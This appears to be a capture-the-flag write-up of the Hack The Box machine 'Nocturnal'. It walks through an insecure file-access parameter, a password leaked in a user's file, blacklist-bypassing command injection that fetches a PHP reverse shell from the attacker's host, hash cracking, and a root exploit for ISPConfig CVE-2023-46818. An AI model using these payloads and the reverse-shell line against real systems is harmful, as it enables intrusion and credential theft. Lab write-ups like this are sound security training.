Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 13 Apr 2025
IP: 10.10.11.64

πŸ•΅οΈ Enumeration & Initial Access

πŸ” Nmap Scan

1
2
3
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
80/tcp open  http    nginx 1.18.0

Web server redirected to http://nocturnal.htb, so I added this to /etc/hosts.

πŸ•ΈοΈ Web Application Analysis

htb-noc1.png

Registered a test account on the site and noticed lack of proper access control. Supplying different usernames in the view.php?username= parameter allowed access to files belonging to other users.

htb-noc2.png

πŸ‘€ Username Fuzzing

Using ffuf, I discovered valid usernames by monitoring for response size changes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ffuf -u "http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf" -w ../../wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -fs 2985 -H "Cookie: PHPSESSID=f515ofbau2c7b662fgdt3pdus0"

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf
 :: Wordlist         : FUZZ: /mnt/f/ctf/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
 :: Header           : Cookie: PHPSESSID=f515ofbau2c7b662fgdt3pdus0
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 2985
________________________________________________

admin [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 52ms]
amanda [Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 46ms]
tobias [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 46ms]
admin1 [Status: 200, Size: 3193, Words: 1176, Lines: 129, Duration: 49ms]

πŸ“„ File Disclosure

Accessed Amanda’s file:

1
http://nocturnal.htb/view.php?username=amanda&file=test-1.pdf

Extracted password from the document privacy.obt:
arHkG7HAI68X8s1J

Attempted SSH login with these credentials but failed. Logged into the web application instead.

πŸ› οΈ Admin Panel Access

Amanda had access to the admin panel.

htb-noc3.png

While reviewing admin.php, I noticed a backup feature vulnerable to command injection via the zip command, despite input sanitization.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

if (isset($_POST['backup']) && !empty($_POST['password'])) {
    $password = cleanEntry($_POST['password']);
    $backupFile = "backups/backup_" . date('Y-m-d') . ".zip";

    if ($password === false) {
        echo "<div class='error-message'>Error: Try another password.</div>";
    } else {
        $logFile = '/tmp/backup_' . uniqid() . '.log';
       
        $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " .  > " . $logFile . " 2>&1 &";
        
        $descriptor_spec = [
            0 => ["pipe", "r"], // stdin
            1 => ["file", $logFile, "w"], // stdout
            2 => ["file", $logFile, "w"], // stderr
        ];

πŸšͺ Command Injection Exploit

By bypassing the filter using newline (%0A) and tab (%09) characters, I crafted a payload to download a reverse shell:

1
%0Awget%09http%3A%2F%2F10.10.14.120%3A8001%2Fshellrev.php%0A

Shell file (shellrev.php):

1
<?php exec("bash -c 'bash -i >& /dev/tcp/10.10.xx.xxx/1234 0>&1'"); ?>

htb-noc4.png

After triggering the payload and visiting the uploaded shell, I caught a reverse shell:

1
curl http://nocturnal.htb/shellrev.php
1
2
3
4
5
6
nc -lvvnkp 1234
listening on [any] 1234 ...
connect to [10.10.xx.xxx] from (UNKNOWN) [10.10.11.64] 41272
bash: cannot set terminal process group (861): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nocturnal:~/nocturnal.htb$

πŸ”“ User Flag

Inside /var/www/nocturnal_database, I found a web application DB file. Cracked it using John:

htb-noc5.png

1
2
john hash --wordlist=rockyou.txt --format=Raw-MD5
# tobias : slowmotionapocalypse

Logged in via SSH:

1
2
3
4
5
ssh tobias@nocturnal.htb
tobias@nocturnal.htb's password:

tobias@nocturnal:~$ cat user.txt
6e34f71803141b48839bd95xxxxxx

Captured user.txt.

πŸš€ Privilege Escalation – Root Flag

πŸ”Ž Internal Service Discovery

1
2
3
4
5
6
7
8
9
10
11
12
13
tobias@nocturnal:~$ netstat -punta | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -

Found a web service on localhost:8080.

πŸ” Port Forwarding

1
ssh -L 8081:127.0.0.1:8080 -N -f tobias@nocturnal.htb

Accessed ISPConfig on http://localhost:8081.

htb-noc6.png

Tried known credentials from earlier:

1
admin : slowmotionapocalypse

Success!

🧨 ISPConfig RCE – CVE-2023-46818

ISPConfig v3.2.10p1 was vulnerable to PHP Code Injection. Used this PoC:

https://github.com/ajdumanhug/CVE-2023-46818.git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
python3 CVE-2023-46818.py http://localhost:8081 admin slowmotionapocalypse
[+] Logging in with username 'admin' and password 'slowmotionapocalypse'
[+] Login successful!
[+] Fetching CSRF tokens...
[+] CSRF ID: language_edit_c28c5e14df61508036db6d2d
[+] CSRF Key: adf3643649dacfee88e3eaba82e867c02011682a
[+] Injecting shell payload...
[+] Shell written to: http://localhost:8081/admin/sh.php
[+] Launching shell...

ispconfig-shell# id
uid=0(root) gid=0(root) groups=0(root)

ispconfig-shell# cat /root/root.txt
e242c019b2bdfe5817c0656xxxxxxxxxxx

And finally…
πŸŽ‰ Got the root flag!